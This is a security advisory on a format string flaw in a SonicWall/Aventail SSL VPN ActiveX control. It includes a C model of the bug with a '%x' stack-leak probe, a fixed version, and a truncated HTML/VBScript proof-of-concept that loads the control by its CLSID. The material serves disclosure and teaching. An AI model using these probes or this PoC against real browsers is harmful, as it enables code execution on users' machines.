Background:
===========
SonicWall has added the award-winning Aventail SSL VPN product line to our E-Class SRA appliances. Aventail's best-of-breed SSL VPNs deliver secure remote access to the most resources from the most end point locations. Aventail was named in the Visionaries quadrant in the SSL VPN Magic Quadrant report from Gartner, considered to be the leading analyst firm covering the SSL VPN industry.
(Product description from the vendor website)
Description:
============
Remote exploitation of a format string vulnerability in the End-Point Interrogator/Installer ActiveX control could allow an attacker to execute arbitrary code within the security context of the targeted user. Because the control is marked safe for scripting and safe for initialization, any web page rendered by Internet Explorer can instantiate it and call the affected methods.
The affected method is "AuthCredential". The "ConfigurationString" method also appears to be vulnerable, but the control Base64-decodes its argument before using it, so the format string has to be supplied Base64-encoded.
Name:             End-Point Interrogator/Installer Module
Vendor:           Aventail Corporation
Type:             ActiveX control
Version:          10.3.42
ProgID:           EPILib.EPInterrogator
GUID:             {2a1be1e7-c550-4d67-a553-7f2d3a39233d}
File:             epi.dll
Folder:           %USERPROFILE%\Application Data\Aventail\EPI
Safe for Script:  True
Safe for Init:    True
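The following C program is an added example, not code from this advisory and not Aventail's or SonicWall's own source (epi.dll is native code, which is why the model is written in C). It models the bug class the description refers to: a printf-style logging helper inside the control, and methods that hand the caller's string straight through as that helper's format string. The "ConfigurationString" path is modelled with a small Base64 decoder in front of the same sink, which is why the payload has to be encoded on the way in. All function names (log_event, vulnerable_auth_credential, safe_auth_credential, vulnerable_configuration_string, b64_decode) and the probe input "user%x%x" are hypothetical, constructed for the demonstration.

```c
/*
 * Added example (hypothetical model of the advisory's bug class, not
 * Aventail/SonicWall code). A native logging helper takes a printf-style
 * format; the vulnerable methods pass attacker data in as that format.
 */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical logging helper such as a native control might contain.
 * The helper itself is fine; the callers below are the bug. */
static int log_event(char *dst, size_t dstlen, const char *fmt, ...)
{
    va_list ap;
    int n;
    va_start(ap, fmt);
    n = vsnprintf(dst, dstlen, fmt, ap);
    va_end(ap);
    return n;
}

/* Model of AuthCredential: the caller's string becomes the format.
 * "%x" directives then read words off the stack; "%n" would write. */
int vulnerable_auth_credential(const char *cred, char *out, size_t outlen)
{
    return log_event(out, outlen, cred);          /* BUG: user data as format */
}

/* Hardened form: user data is only ever a %s argument, never the format. */
int safe_auth_credential(const char *cred, char *out, size_t outlen)
{
    return log_event(out, outlen, "%s", cred);
}

/* Minimal Base64 decoder (standard alphabet, '=' padding).
 * Returns bytes written, or -1 on a malformed or oversized input. */
int b64_decode(const char *in, unsigned char *out, size_t outlen)
{
    static const char tbl[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    unsigned int acc = 0;
    int bits = 0;
    size_t n = 0;
    for (; *in && *in != '='; in++) {
        const char *p = strchr(tbl, *in);
        if (!p) return -1;
        acc = (acc << 6) | (unsigned int)(p - tbl);
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n >= outlen) return -1;
            out[n++] = (unsigned char)((acc >> bits) & 0xff);
        }
    }
    return (int)n;
}

/* Model of ConfigurationString: the value is Base64-decoded and *then*
 * used as the format, so an attacker must Base64-encode the payload. */
int vulnerable_configuration_string(const char *b64, char *out, size_t outlen)
{
    unsigned char plain[256];
    int n = b64_decode(b64, plain, sizeof plain - 1);
    if (n < 0) return -1;
    plain[n] = '\0';
    return log_event(out, outlen, (const char *)plain); /* BUG: decoded user data as format */
}

int main(void)
{
    char out[128];
    const char *probe = "user%x%x";        /* constructed probe: %x leaks stack words */

    safe_auth_credential(probe, out, sizeof out);
    printf("safe      : %s\n", out);       /* the probe comes back verbatim */

    vulnerable_auth_credential(probe, out, sizeof out);
    printf("vulnerable: %s\n", out);       /* %x replaced by whatever was on the stack */

    /* "dXNlciV4JXg=" is base64("user%x%x"), i.e. the same probe encoded for the
     * ConfigurationString path. */
    vulnerable_configuration_string("dXNlciV4JXg=", out, sizeof out);
    printf("config    : %s\n", out);
    return 0;
}
```

Build with `gcc -Wall -o fmt fmt.c` and run it: the safe path echoes the probe, while both vulnerable paths replace each `%x` with hex digits read from the stack. Note that `-Wformat-security` only flags the vulnerable calls if `log_event` carries `__attribute__((format(printf, 3, 4)))`; a wrapper without that attribute hides the bug from the compiler, which is one reason format string bugs survive in native COM/ActiveX code. The fix is the one-line change in `safe_auth_credential`: always pass a literal format and the untrusted data as an argument.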
Proof of Concept:
=================
<html>
<head>
<title>SonicWall E-Class SSL-VPN ActiveX Control DoS PoC</title>
</head>
<body>
<pre>
<img src="";>
<input type=button name="submit" value="rule #5 – shoot first">
</pre>
<object classid='clsid:2a1be1e7-c550-4d67-a553-7f2d3a39233d' id='obj'></object>
<script language='vbscript'>